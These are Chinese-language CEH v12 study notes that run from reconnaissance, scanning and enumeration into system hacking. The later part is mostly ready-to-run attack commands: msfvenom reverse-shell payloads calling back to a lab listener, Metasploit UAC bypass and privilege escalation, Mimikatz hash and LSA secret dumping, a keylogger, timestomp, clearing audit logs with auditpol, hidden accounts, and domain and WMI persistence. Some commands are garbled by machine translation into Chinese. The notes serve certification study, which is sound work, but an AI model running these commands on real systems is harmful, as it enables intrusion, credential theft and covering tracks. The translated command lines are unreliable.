CEH V12
足跡是指從可公開存取的來源收集盡可能多的有關目標網路的資訊。
透過搜尋引擎進行足跡追蹤 https://mattw.io/youtube-metadata/
YouTube 元資料工具收集影片、其上傳者、播放清單及其創建者或頻道的單一詳細資訊。
TinEye 反向影像搜尋
FTP 搜尋引擎:
物聯網搜尋引擎:
域和子域:
收割機:
該工具從不同的公共來源(例如搜尋引擎、PGP 金鑰伺服器和 SHODAN 電腦資料庫)收集電子郵件、子網域、主機、員工姓名、開放連接埠和橫幅,並使用 Google、Bing、SHODAN 等。
theHarvester -d eccouncil -l 200 -b linkedin
-d 指定要搜尋的網域名稱或公司名稱(此處為 eccouncil),-l 指定要檢索的結果數量,-b 指定資料來源為 LinkedIn。
深網和暗網搜尋:
來自各個社群網站的資訊:
夏洛克 :
Sherlock 是一個基於 Python 的工具,用於透過各種社交網站收集有關目標人員的資訊。 Sherlock 在大量社交網站上搜尋給定的目標用戶,找到此人,並顯示結果以及與目標人相關的完整 URL。
社交搜尋
Followerwonk
Followerwonk 是線上工具,可協助您探索並發展您的社交圖譜,深入 Twitter 分析; 例如,誰是你的追隨者? 他們位於哪裡? 他們什麼時候發推文? 這可用於收集有關任何目標組織或個人的 Twitter 資訊。
收集有關目標網站的資訊:
DNS 足跡
找到網路範圍
-tracert < – 視窗
偵察:
Recon-ng 是一個具有獨立模組和資料庫互動的網路偵察框架,提供了一個可以進行開源網路偵察的環境。 在這裡,我們將使用Recon-ng進行網路偵察,收集人員信息,並從社交網站收集目標資訊。
馬爾特戈:
Maltego 是一種足跡工具,用於收集最大程度的信息,以用於道德駭客、電腦取證和滲透測試。 它提供了一個轉換庫,用於從開源中發現數據,並以圖形格式可視化該信息,適合鏈結分析和數據挖掘。 Maltego 為您提供了一個圖形介面,可以讓您即時、準確地查看這些關係,甚至可以看到隱藏的聯繫。
OSR框架:
OSRFramework 是一組用來執行開源智慧任務的函式庫。 其中包括對與用戶名檢查、DNS 查找、資訊洩漏研究、深度網路搜尋、正規表示式提取等相關的許多不同應用程式的引用。 它還提供了一種以圖形方式進行這些查詢的方法以及多個互動介面,例如 OSRFConsole 或 Web 介面。
域名:
domainfy -n [網域] -t all
-> -n:指定要檢查的暱稱或暱稱清單。 -t:指定將搜尋暱稱的頂級網域清單。
搜尋:
檢查不同社交網路上是否存在給定的用戶詳細信息g 平台,例如 Github、Instagram 和 Keyserverubuntu。 鍵入 searchfy -q“目標使用者名稱或設定檔名稱”
比爾密碼:
BillCipher 是網站或 IP 位址的資訊收集工具。 使用此工具,您可以收集 DNS 查找、Whois 查找、GeoIP 查找、子網路查找、連接埠掃描器、頁面連結、區域傳輸、HTTP 標頭等資訊。在這裡,我們將使用 BillCipher 工具來追蹤目標網站 URL 。
開源情報框架: [Scanning Networks] 掃描網絡
網路掃描是指為識別網路中執行的主機、連接埠和服務而執行的一組程序。
使用 Nmap 發現主機: nmap -sn -PR [目標 IP 位址]
-> -sn:停用連接埠掃描,-PR:執行ARP ping掃描。
-> -PU:執行UDP ping掃描。
-> -PE:執行ICMP ECHO ping 掃描。
-> -PP:執行ICMP時間戳ping掃描。
ICMP 位址遮罩 Ping 掃描:此技術是傳統 ICMP ECHO ping 掃描的替代方法,用於在管理員封鎖 ICMP ECHO ping 時確定目標主機是否處於活動狀態。
-nmap -sn -PM [目標IP位址]
TCP SYN Ping Scan:此技術會向目標主機發送空的 TCP SYN 封包,ACK 回應表示該主機處於活動狀態。
-nmap -sn -PS [目標IP位址]
TCP ACK Ping Scan:此技術會向目標主機發送空的 TCP ACK 封包; RST 回應表示主機處於活動狀態。
-nmap -sn -PA [目標IP位址]
IP 協定 Ping 掃描:該技術會向目標主機發送不同 IP 協定的不同偵測資料包,任何偵測的任何回應都表示主機處於活動狀態。
-nmap -sn -PO [目標IP位址]
sx arp [目標子網路]
sx arp [目標子網路] – json | tee arp 緩存
cat arp.cache | sx tcp -p 1-65535 [目標IP位址]
cat arp.cache | sx udp – json -p [目標埠] 10.10.1.11
nmap -sS -v [目標IP位址]
-sS:執行隱形掃描/TCP 半開掃描,-v:啟用詳細輸出(包括輸出中的所有主機和連接埠)。
隱形掃描涉及在三向握手訊號完成之前突然重置客戶端和伺服器之間的 TCP 連接,從而使連接保持半開啟狀態。 此掃描技術可用於繞過防火牆規則、日誌記錄機制並隱藏在網路流量下。
nmap -sX -v [目標IP位址]
橫幅抓取或作業系統指紋識別是一種用於確定遠端目標系統上運行的作業系統的方法。
有兩種類型的作業系統發現或橫幅抓取技術:
active banner grabbing 主動橫幅抓取 特製的資料包被傳送到遠端作業系統,並記錄回應,然後將其與資料庫進行比較以確定作業系統。 由於 TCP/IP 堆疊實現的差異,不同作業系統的回應有所不同。
passive banner grabbing 被動橫幅抓取 這取決於堆疊的差異實作以及作業系統回應資料包的各種方式。 被動橫幅抓取包括從錯誤訊息中抓取橫幅、嗅探網路流量以及從頁面擴充中抓取橫幅。
透過生存時間 (TTL) 識別目標系統的作業系統:
nmap – script smb-os-discovery.nse [目標 IP 位址]
– script:指定自訂腳本和 smb-os-discovery.nse:嘗試透過 SMB 協定(連接埠 445 或 139)確定作業系統、電腦名稱、網域、工作群組和目前時間。
unicornscan [目標IP位址] -Iv
在此指令中,-I 指定立即模式,v 指定詳細模式。
超越 IDS 與防火牆進行掃描 入侵偵測系統 (IDS) 和防火牆是旨在防止未經授權的人員存取網路的安全機制。 然而,即使 IDS 和防火牆也有一些安全限制。 防火牆和 IDS 旨在避免惡意流量(資料包)進入網絡,但可以使用某些技術將預期資料包發送到目標並逃避 IDS/防火牆。
躲避 IDS/防火牆的技術:
資料包分段:將分段的探測資料包傳送到預期目標,目標在收到所有分段後重新組裝它
來源路由:指定畸形資料包到達預期目標的路由路徑
來源連接埠操縱:用普通來源連接埠操縱實際來源連接埠以逃避IDS/防火牆
IP 位址誘餌:產生或手動指定誘餌的 IP 位址,以便 IDS/防火牆無法確定實際 IP 位址
IP 位址欺騙:更改來源 IP 位址,使攻擊看起來像是其他人進來的
建立自訂資料包:傳送自訂資料包以掃描防火牆以外的預期目標
隨機主機順序:以隨機順序掃描目標網路中的主機數量,以掃描位於防火牆之外的預期目標
發送錯誤校驗和:將帶有錯誤或偽造 TCP/UPD 校驗和的封包傳送到預期目標
代理伺服器:使用代理伺服器鏈隱藏掃描的實際來源並規避某些 IDS/防火牆限制
匿名器:使用匿名器可以繞過網路審查並逃避某些 IDS 和防火牆規則
nmap -f [目標IP位址]
-f 開關用於將 IP 封包分割成微小的片段封包。
資料包分片是指將探測資料包傳送到網路時將其分割成多個較小的資料包(片段)。 當這些資料包到達主機時,主機後面的IDS和防火牆通常會將所有資料包排隊並一一處理。 然而,由於這種處理方法涉及更大的CPU消耗以及網路資源,因此大多數IDS的配置使得它在連接埠掃描期間跳過碎片資料包。
nmap -g 80 [目標IP位址]
在此命令中,您可以使用 -g 或 – source-port 選項來執行來源連接埠操作。
來源連接埠操縱是指用通用連接埠號碼操縱實際連接埠號碼以逃避 IDS/防火牆:當防火牆配置為允許來自 HTTP、DNS、FTP 等知名連接埠的封包時,這非常有用。
nmap -mtu 8 [目標IP位址]
在此指令中,-mtu:指定最大傳輸單元 (MTU) 的數量(此處為 8 位元組資料包)。
使用 MTU,可以傳輸較小的資料包,而不是一次發送一個完整的資料包。 該技術規避了目標機器中啟用的過濾和偵測機制。
nmap -D RND:10 [目標IP位址]
在此指令中,-D:執行誘餌掃描,RND:產生隨機且非保留的 IP 位址(此處為 10)。
IP位址誘餌技術是指產生或手動指定誘餌的IP位址來逃避IDS/防火牆。 這種技術使得 IDS/防火牆很難確定哪個 IP 位址實際上正在掃描網路以及哪些 IP 位址是誘餌。 透過使用此命令,Nmap 會自動產生隨機數量的誘餌進行掃描,並將真實 IP 位址隨機放置在誘餌 IP 位址之間。
nmap -sT -Pn – spoof-mac 0 [目標IP位址]
在此指令中 – spoof-mac 0 表示隨機化 MAC 位址,-sT:執行 TCP 連線/全開放掃描,-Pn 用於跳過主機發現。
MAC 位址欺騙技術涉及使用網路上合法使用者的 MAC 位址來欺騙 MAC 位址。 此技術可讓您假裝是合法主機向目標電腦/網路發送請求資料包。
使用 Hping3 建立自訂 UDP 和 TCP 封包以掃描 IDS/防火牆之外
Hping3 是一個使用 TCL 語言的可編寫腳本的程序,可以透過描述資料包的二進位或字串表示形式接收和發送資料包。
hping3 [目標 IP 位址] – udp – rand-source – data 500
這裡, – udp指定發送UDP封包到目標主機, – rand-source啟用隨機來源模式, – data指定封包主體大小。
hping3 -S [目標IP位址] -p 80 -c 5
這裡,-S 指定目標機器上的 TCP SYN 請求,-p 指定分配發送流量的端口,-c 是發送到目標機器的封包計數。
hping3 [目標IP位址] – flood
使用 Metasploit 掃描目標網路:
Metasploit Framework 是一種工具,可提供有關目標組織系統中的安全漏洞的信息,並有助於滲透測試和 IDS 簽名開發。 它為攻擊者、漏洞編寫者和有效負載編寫者的任務提供了便利。 該框架的一個主要優點是模組化方法,即允許將任何漏洞與任何有效負載結合。
service postgresql start
msfdb init
msfconsole
db_status
nmap -Pn -sS -A -oX Test 10.10.1.0/24
db_import Test
hosts
db_services
use auxiliary/scanner/portscan/syn
set INTERFACE eth0
set PORTS 80
set RHOSTS 10.10.1.5-23
set THREADS 50
run
use auxiliary/scanner/portscan/tcp
set RHOSTS [Target IP Address]
run
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.1.5-23
set THREADS 11
Enumeration列舉
枚舉是從系統或網路中提取使用者名稱、電腦名稱、網路資源、共用和服務的過程。
NetBIOS 列舉:
NetBIOS 代表網路基本輸入輸出系統。 Windows 使用 NetBIOS 進行檔案和印表機共用。 NetBIOS 名稱是指派給 Windows 系統的唯一電腦名稱,由 16 個字元的 ASCII 字串組成,用於透過 TCP/IP 識別網路設備。 前 15 個字元用於設備名稱,第 16 個字元保留用於服務或名稱記錄類型。
nbtstat -a [遠端機器的IP位址]
在此指令中,-a 顯示遠端電腦的 NetBIOS 名稱表。
-nbtstat -c
在此指令中,-c 列出遠端電腦的 NetBIOS 名稱快取的內容。
nmap -sV -v – script nbstat.nse [目標 IP 位址]
-sV 偵測服務版本,-v 啟用詳細輸出(即,在輸出中包含所有主機和連接埠), – script nbstat.nse 執行 NetBIOS 列舉。
-nmap -sU -p 137 – 腳本nbstat.nse
SNMP 枚舉概述:
SNMP(簡單網路管理協議)是運行在UDP(用戶資料封包協定)上的應用層協議,維護和管理IP網路上的路由器、集線器和交換器。 SNMP 代理程式在 Windows 和 UNIX 網路的網路裝置上執行。
SNMP 枚舉使用 SNMP 建立目標電腦上的使用者帳戶和裝置清單。 SNMP 使用兩種類型的軟體元件進行通訊:SNMP 代理程式和 SNMP 管理站。 SNMP代理程式位於網路設備上,SNMP管理站與代理程式進行通訊。
SNMP 使用連接埠 161
nmap -sU -p 161 [目標IP位址]
-sU 執行UDP 掃描,-p 指定要掃描的連接埠。
snmp-check [目標 IP 位址]
SNMPWalk:
SnmpWalk 是一個命令列工具,可以立即掃描大量 SNMP 節點並識別一組可用於存取目標網路的變數。 它被發佈到根節點,以便可以獲取來自所有子節點(例如路由器、交換器)的資訊。
snmpwalk -v1 -c public [目標IP]
–v:指定 SNMP 版本號(1 或 2c 或 3), –c:設定團體字串。
snmpwalk -v2c -c public [目標IP位址]
–v:指定SNMP版本(此處選擇2c), –c:設定群組字串。
nmap -sU -p 161 – script=snmp-sysdescr [目標IP位址]
-sU:指定UDP掃描,-p:指定要掃描的端口,-–script:是用於執行給定腳本的參數(此處為snmp-sysdescr)。
nmap -sU -p 161 – script=snmp-processes [目標IP位址]
nmap -sU -p 161 – script=snmp-win32-software [目標IP位址]
nmap -sU -p 161 – script=snmp-interfaces [目標IP位址]
LDAP 枚舉:
LDAP(輕量級目錄存取協定)是一種用於透過網路存取分散式目錄服務的 Internet 協定。 LDAP 使用 DNS(網域名稱系統)進行快速尋找並快速解決查詢。 客戶端透過連線到 DSA(目錄系統代理)(通常在 TCP 連接埠 389 上)來啟動 LDAP 會話,並向 DSA 發送操作請求,然後 DSA 做出回應。 BER(基本編碼規則)用於在客戶端和伺服器之間傳輸訊息。 人們可以匿名查詢 LDAP 服務以獲取敏感信息,例如使用者名稱、地址、部門詳細資訊和伺服器名稱。
nmap -sU -p 389 [目標IP位址]
nmap -p 389 – script ldap-brute – script-args ldap.base='"cn=users,dc=CEH,dc=com"' [目標IP位址]
ldap搜尋
ldapsearch 是 ldap_search_ext(3) 庫呼叫的 shell 可存取介面。 ldapsearch 開啟與 LDAP 伺服器的連接,綁定該連接,並使用指定的參數執行搜尋。 過濾器應符合 RFC 4515 中定義的搜尋過濾器的字串表示形式。如果未提供,則使用預設過濾器 (objectClass=*)。
ldapsearch -h [目標 IP 位址] -x -s 基本命名上下文
-x:指定簡單認證,-h:指定主機,-s:指定範圍。
ldapsearch -h [目標 IP 位址] -x -b “DC=CEH,DC=com”
-x:指定簡單認證,-h:指定主機,-b:指定搜尋的基本DN。
ldapsearch -x -h [目標 IP 位址] -b "DC=CEH,DC=com" "objectclass=*"
-x:指定簡單認證,-h:指定主機,-b:指定搜尋的基本DN。
NFS 列舉:
NFS(網路檔案系統)是一種檔案系統,使電腦使用者能夠透過遠端伺服器存取、檢視、儲存和更新檔案。 客戶端電腦可以像在本機系統上存取該資料一樣存取該遠端資料。
DNS 列舉:
DNS枚舉技術用於獲取有關DNS的信息目標組織的伺服器和網路基礎設施。 可以使用下列技術執行 DNS 列舉:
DNSSEC 區域行走:
DNSSEC 區域遍歷是一種 DNS 枚舉技術,用於在 DNS 區域配置不正確時取得目標 DNS 伺服器的內部記錄。 枚舉的區域資訊可以幫助您建立主機網路圖。
./dnsrecon.py -d [目標域] -z
在此指令中,-d 指定目標網域,-z 指定使用標準枚舉執行 DNSSEC 區域遍歷。
nmap – script=broadcast-dns-service-discovery [目標域]
nmap -T4 -p 53 – script dns-brute [目標域]
nmap – script dns-srv-enum – script-args "dns-srv-enum.domain='[目標域]'”
SMTP 列舉:
簡單郵件傳輸協定 (SMTP) 是一種基於網際網路標準的電子郵件傳輸通訊協定。 郵件系統通常使用 SMTP 與 POP3 和 IMAP,這使得使用者可以將郵件保存在伺服器郵箱中,並在需要時從伺服器下載它們。 SMTP 使用郵件交換 (MX) 伺服器透過 DNS 轉送郵件。 它在 TCP 連接埠 25、2525 或 587 上運行。
nmap -p 25 – script=smtp-enum-users [目標 IP 位址]
nmap -p 25 – script=smtp-open-relay [目標IP位址]
nmap -p 25 – script=smtp-commands [目標 IP 位址]
RPC 枚舉:枚舉 RPC 端點可以識別這些服務連接埠上的易受攻擊的服務
SMB 枚舉:枚舉 SMB 服務可實現橫幅抓取,從而獲取作業系統詳細資訊和正在運行的服務版本等信息
FTP 枚舉:枚舉 FTP 服務可產生有關連接埠 21 和任何正在執行的 FTP 服務的資訊; 這些資訊可用於發動各種攻擊,例如 FTP 反彈、FTP 暴力破解和資料包嗅探
使用 Enum4linux 列舉 Windows 和 Samba 主機的資訊:
Enum4linux 是用來列舉 Windows 和 Samba 系統資訊的工具。 它用於共享枚舉、密碼策略檢索、遠端作業系統的識別、檢測主機是否在工作群組或網域中、主機上的使用者清單、列出群組成員資訊等。
enum4linux -u martin -p apple -n [目標IP位址]
enum4linux -u martin -p apple -U [目標IP位址]
在此指令中,-u user 指定要使用的使用者名,-p pass 指定密碼,-U 檢索使用者清單。
-P 檢索密碼原則資訊。
-o 檢索作業系統資訊。
-G 檢索群組和成員清單。
-S 檢索共享清單。
Vulnerability Analysis漏洞分析
漏洞評估是對系統或應用程式(包括目前安全程式和控制)抵禦攻擊的能力的檢查。 漏洞研究是發現導致作業系統及其應用程式容易受到攻擊或濫用的漏洞和設計缺陷的過程。
漏洞是指系統設計或實作上的弱點,可被利用來危害系統的安全。 它通常是一個安全漏洞,使攻擊者能夠繞過用戶身份驗證進入系統。 網路中易受攻擊的系統通常有兩個主要原因:軟體或硬體配置錯誤以及程式設計實作不良。 攻擊者利用這些漏洞對組織資源執行各種類型的攻擊。
漏洞資料庫收集和維護有關資訊系統中存在的各種漏洞的資訊。
以下是一些漏洞評分系統和資料庫:
常見弱點枚舉(CWE)
常見漏洞和暴露(CVE)
國家漏洞資料庫(NVD)
一般漏洞評分系統(CVSS)
https://cwe.mitre.org/
https://www.cve.org/
https://nvd.nist.gov/
使用OpenVAS進行漏洞分析:
OpenVAS 是一個由多種服務和工具組成的框架,提供全面且強大的漏洞掃描和漏洞管理解決方案。 其功能包括未經身份驗證的測試、經過身份驗證的測試、各種高級和低級互聯網和工業協議、大規模掃描的性能調整以及用於實施任何漏洞測試的強大內部編程語言。
使用 Nessus 執行漏洞掃描:
Nessus 是一種評估解決方案,用於識別漏洞、設定問題和惡意軟體,可用於滲透網路。 它執行漏洞、配置和合規性評估。 它支援各種技術,例如作業系統、網路設備、虛擬機器管理程式、資料庫、平板電腦/手機、Web 伺服器和關鍵基礎設施。
System Hacking駭入系統
系統駭客攻擊是測試電腦系統和軟體是否存在安全漏洞的過程,攻擊者可以利用這些漏洞來存取組織的系統以竊取或濫用敏感資訊。
系統駭客攻擊分為四個步驟:
取得存取權限:使用破解密碼和利用漏洞等技術來取得對目標系統的存取權限
權限升級:利用作業系統和軟體應用程式中存在的已知漏洞來升級權限
維護存取權限:維護高層級存取權限以執行惡意活動,例如執行惡意應用程式以及竊取、隱藏或篡改敏感系統文件
清除日誌:透過清除系統日誌中與惡意活動相對應的條目,避免被合法系統使用者識別並保持不被發現,從而避免偵測。
LLMNR(連結本機多播名稱解析)和 NBT-NS(NetBIOS 名稱服務)是 Windows 作業系統的兩個主要元素,用於對同一連結上的主機執行名稱解析。 這些服務在 Windows 作業系統中預設為啟用,可用於提取使用者的密碼雜湊值。
Responder 是 LLMNR、NBT-NS 和 MDNS 投毒者。 它會根據名稱後綴回應特定的 NBT-NS(NetBIOS 名稱服務)查詢。 預設情況下,工具僅回應適用於 SMB 的檔案伺服器服務請求。
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[主機IP位址] LPORT=444 -o /home/attacker/Desktop/Test.exe
使用漏洞利用/多重/處理程序
設定有效負載 windows/meterpreter/reverse_tcp
Armitage:
Armitage 是 Metasploit 的可編寫腳本的紅隊協作工具,可可視覺化目標、推薦漏洞利用並公開框架中的高級後利用功能。 使用此工具,您可以建立會話、共享主機、捕獲資料、下載檔案、透過共享事件日誌進行通訊以及運行機器人來自動執行筆測試任務。
Ninja Jonin:
Buffer Overlow緩衝區溢位:
generic_send_tcp 10.10.1.11 9999 stats.spk 0 0
這裡,10.10.1.11是目標機器的IP位址(Windows 11),9999是目標埠號,stats.spk是spike_script,0和0是SKIPVAR和SKIPSTR的值。
統計.spk
s_readline();
s_string(“TRUN”);
s_string_variable(“0”);
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 11900
msfvenom -p windows/shell_reverse_tcp LHOST=[本機IP位址] LPORT=[監聽埠] EXITFUNC=thread -f c -a x86 -b “\x00”
這裡,-p:有效負載,本地IP位址:10.10.1.13,監聽埠:4444。,-f:檔案類型,-a:體系結構,-b:錯誤字元。
權限是指分配給使用者的特定程式、功能、作業系統、功能、檔案或代碼的安全角色。 它們按使用者類型限制存取。 當您想要存取無權存取的系統資源時,需要提權。 它以兩種形式發生:垂直特權升級和水平特權升級。
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.1.13 -f exe > /home/attacker/Desktop/Exploit.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
sessions -i 1
run post/windows/gather/smart_hashdump
getsystem -t 1
: Uses the service – Named Pipe Impersonation (In Memory/Admin) Technique.
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
set payload windows/meterpreter/reverse_tcp
getsystem -t 1
run post/windows/gather/smart_hashdump
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.1.13 -f exe > /home/attacker/Desktop/Backdoor.exe
在執行利用後活動時,攻擊者嘗試存取檔案以讀取其內容。 執行此操作後,MACE(修改、存取、建立、條目)屬性立即更改,這向檔案使用者或擁有者表明有人已讀取或修改了該資訊。
若要不留下這些 MACE 屬性的痕跡,請在存取檔案後使用 timestomp 指令根據需要變更屬性。
timestomp Secret.txt -v
timestomp Secret.txt -m “02/11/2018 08:10:03”
-m:指定修改的值。
已存取 (-a)、已建立 (-c) 和已修改條目 (-e)
搜尋 -f [檔案名稱.副檔名]
keyscan_start
目錄 /a:h
sc queryex 類型=服務狀態=全部
netsh防火牆顯示狀態
netsh 防火牆顯示配置
wmic /node:"" 產品取得名稱、版本、供應商
wmic cpu 獲取
wmic 使用者帳戶取得名稱,sid
wmic 作業系統,其中 Primary='TRUE' 重新啟動
利用 pkexec 中的漏洞
NFS 配置錯誤
網路檔案系統 (NFS) 是一種允許使用者透過網路遠端存取檔案的協定。 掛載共享後,可以在本地存取遠端 NFS。 如果 NFS 配置錯誤,可能會導致對敏感資料的未經授權的存取或在系統上取得 shell。
showmount -e 10.10.1.9
sudo mount -t nfs 10.10.1.9:/home /tmp/nfs
find / -name "*.txt" -ls 2> /dev/null
尋找/-perm -4000 -ls 2> /dev/null
利用黏滯鍵
黏滯鍵是 Windows 輔助功能,即使在釋放修飾鍵後,它也會使修飾鍵保持活動狀態。 黏滯鍵可以幫助難以按下快速鍵組合的使用者。 按 Shift 鍵 5 次即可啟用它們。 黏滯鍵也可用於獲得對機器的未經身份驗證的特權存取。
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Windows.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
search bypassuac
use exploit/windows/local/bypassuac_fodhelper
getsystem -t 1
use post/windows/manage/sticky_keys
使用 Mimikatz 收集 Hashdump
Mimikatz 是一種後期利用工具,使用戶能夠保存和查看身份驗證憑證,例如 kerberos 票證、從記憶體中轉儲密碼、PIN 以及雜湊。 它使您能夠執行諸如傳遞哈希、傳遞票據等功能,並在網路內進行後利用橫向移動。
透過 FodHelper 註冊表項繞過 Windows UAC 保護。 它作為bypassuac_fodhelper 漏洞出現在Metasploit 中。
load kiwi
help kiwi
lsa_dump_sam
lsa_dump_secrets
LSA金鑰用於管理系統的本機安全性策略,並包含敏感數據,例如使用者密碼、IE密碼、服務帳戶密碼、SQL密碼等。
password_change -u Admin -n [在上一個步驟中取得的 Admin 的 NTLM 雜湊值] -P 密碼
以下討論一些遠端程式碼執行技術:
利用客戶端執行
規劃任務
服務執行
Windows 管理規格 (WMI)
Windows 遠端管理 (WinRM)
隱藏檔案:隱藏檔案是使用 rootkit、NTFS 流和隱寫技術等方法隱藏惡意程式的過程,以防止惡意程式被防毒、反惡意軟體和反間諜軟體應用程式等保護性應用程式偵測到。安裝在目標系統上。 這有助於維持未來對目標系統的訪問,因為隱藏的惡意檔案可以在未經受害者同意的情況下提供對目標系統的直接存取。
使用 NTFS 流隱藏檔案:
NTFS 是一種檔案系統,它藉助兩個資料流(稱為 NTFS 資料流)以及檔案屬性來儲存任何檔案。 第一資料流儲存要儲存的檔案的安全描述符,例如權限; 第二個將資料儲存在檔案中。 備用資料流是可以存在於每個檔案中的另一種類型的命名資料流。
輸入 c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
此指令將隱藏 readme.txt 中的 calc.exe。
mklink backdoor.exe readme.txt:calc.exe
使用空白隱寫術隱藏數據
隱寫術是一門以這樣的方式編寫隱藏訊息的藝術和科學,除了預期的接收者之外,沒有人知道該訊息的存在。 隱寫術根據用於隱藏檔案的覆蓋媒體進行分類。 專業的道德駭客或滲透測試人員必須對各種隱寫術技術有深入的了解。
空白隱寫術用於透過在行尾添加空白來隱藏 ASCII 文字中的訊息。 由於空格和製表符在文字檢視器中通常不可見,因此對於臨時觀察者而言,該訊息實際上是隱藏的。 如果使用內建加密,即使偵測到訊息也無法讀取。 為了執行空白隱寫術,使用了各種隱寫術工具,例如snow。 Snow 是一個程序,它透過在行尾附加製表符和空格來隱藏文字檔案中的消息,並從包含這些訊息的檔案中提取隱藏訊息。 使用者透過附加最多七個空格並散佈製表符的序列來隱藏文字檔案中的資料。
https://darkside.com.au/snow/
使用 OpenStego 和 StegOnline 進行影像隱寫術
影像是用於隱寫術的熱門封面物件。 在圖像隱寫術中,使用者將資訊隱藏在不同格式的圖像檔案中,例如.PNG、.JPG 或.BMP。
開放式隱寫
OpenStego 是一種影像隱寫工具,可將資料隱藏在影像中。 它是一個基於 Java 的應用程序,支援基於密碼的資料加密,以提供額外的安全層。 它使用 DES 演算法進行資料加密,並結合 MD5 雜湊從提供的密碼中匯出 DES 金鑰。
https://www.openstego.com/
Steg線上
OpenStego 是一種影像隱寫工具,可將資料隱藏在影像中。 它是一個基於 Java 的應用程序,支援基於密碼的資料加密,以提供額外的安全層。 它使用 DES 演算法進行資料加密,並結合 MD5 雜湊從提供的密碼中匯出 DES 金鑰。
https://www.openstego.com/
Steg線上
透過濫用引導或登入自動啟動執行來維持持久性
Windows 中的啟動資料夾包含 Windows 電腦啟動時執行的應用程式捷徑清單。 將惡意程式註入啟動資料夾會導致程式在使用者登入時執行,並協助您使用配置錯誤的啟動資料夾維持持久性或升級權限。
透過利用 Active Directory 物件維護網域持久性
AdminSDHolder 是一個具有預設安全權限的 Active Directory 容器,它用作 AD 帳戶和群組(例如網域管理員、企業管理員等)的模板,以保護他們免受無意的權限修改。
如果將使用者帳戶新增至AdminSDHolder的存取控制清單中,則該使用者將獲得相當於網域管理員的「GenericAll」權限。
導入模組./powerview.psm1
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName Martin -Verbose -Rights All
Get-ObjectAcl -SamAccountName「Martin」 -ResolveGUIDs
通常情況下,ACL 的變更會在 60 分鐘後自動傳播,我們可以輸入以下命令將 SDProp 的時間間隔減少到 3 分鐘。
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /V AdminSDProtectFrequency /T REG_DWORD /F /D 300
Microsoft 不建議修改此設置,因為這可能會導致與跨網域的 LSASS 進程相關的效能問題。
網路群組「網域管理員」Martin /add /domain
使用 WMI 進行權限升級和維護持久性
WMI(Windows Management Instrumentation)事件訂閱可用於安裝事件篩選器、提供者和綁定,以便在定義的事件發生時執行程式碼。 它使系統管理員能夠在本地和遠端執行任務。
載入powershell
powershell_shell
導入模組./WMI-Persistence.ps1
安裝-持久性-觸發啟動-有效負載“C:\Users\Administrator\Downloads\wmi.exe”
使用 Covert_TCP 的隱藏通道
網路使用網路存取控制權限來允許或拒絕流經它們的流量。 隧道用於繞過防火牆、IDS、IPS 和 Web 代理程式的存取控制規則以允許某些流量。 可以透過將資料插入協定標頭未使用的欄位來建立隱藏通道。 TCP 或 IP 中有許多未使用或誤用的字段,可以透過這些字段發送資料以繞過防火牆。
Covert_TCP 程式操縱封包的 TCP/IP 標頭,將檔案從任何主機一次傳送一個位元組到目的地。 它既可以充當伺服器也可以充當客戶端,並且可用於隱藏 IP 標頭內傳輸的資料。 當繞過防火牆並使用看似合法的資料包發送資料但不包含可供嗅探器分析的資料時,這非常有用。
清除日誌
為了不被發現,入侵者需要從系統中刪除所有安全危害的證據。 為了實現這一點,他們可能會使用某些日誌擦除實用程式來修改或刪除系統中的日誌,從而刪除其存在的所有證據。
用於清除安全損害證據的各種技術如下:
停用審核:停用目標系統的審核功能
清除日誌:清除並刪除與安全危害活動對應的系統日誌條目
操縱日誌:以入侵者不會因非法行為而被逮捕的方式操縱日誌
覆蓋網路上的蹤跡:使用反向HTTP shell、反向ICMP隧道、DNS隧道和TCP參數等技術來覆蓋網路上的蹤跡。
覆蓋作業系統上的痕跡:使用NTFS流來隱藏和覆蓋目標系統中的惡意文件
刪除檔案:使用 Cipher.exe 等命令列工具刪除資料並防止其將來恢復
停用 Windows 功能:停用 Windows 功能,例如上次存取時間戳記、休眠、虛擬記憶體和系統還原點以覆蓋軌道
審計警察
Auditpol.exe 是命令列公用工具,用於變更類別和子類別層級的稽核安全設定。 您可以使用 Auditpol 啟用或停用本機或遠端系統上的安全審核,並調整不同類別安全事件的審核標準。
即時地,一旦入侵者獲得管理權限,他們就會在auditpol.exe的幫助下停用審核。 一旦他們完成任務,他們就會使用相同的工具(audit.exe)重新開啟審核。
auditpol /get /category:*
auditpol /set /category:"system","account logon" /success:enable /failure:enable
auditpol /clear /y
若要隱藏使用者帳戶,請輸入 net user Test /active:no
,然後按 Enter。 測試帳戶將從清單中刪除。
Malware Threats惡意軟體威脅
惡意軟體是一種惡意軟體,它會損壞或停用電腦系統,並為惡意軟體創建者提供對這些系統的有限或完全控制,以進行盜竊或詐欺。 惡意軟體包括病毒、蠕蟲、特洛伊木馬、rootkit、後門、殭屍網路、勒索軟體、間諜軟體、廣告軟體、恐嚇軟體、垃圾軟體、粗暴軟體、加密程式、鍵盤記錄程式和其他軟體。
木馬
在古希臘神話中,希臘人借助希臘人建造的用來隱藏士兵的巨型木馬贏得了特洛伊戰爭。 希臘人把這匹馬留在了特洛伊城門前。 特洛伊人認為這是希臘人在退出戰爭之前留下的禮物,因此將這匹馬帶進了他們的城市。 到了晚上,隱藏的希臘士兵從木馬上出現,為他們的士兵打開了城門,最後摧毀了特洛伊城。
因此,從這個神話中得到啟示,計算機特洛伊木馬是一種程序,其中惡意或有害代碼包含在看似無害的程序或數據中,其方式是它可以獲得控制權並造成損害,例如破壞計算機上的文件分配表你的硬碟。
老鼠木馬
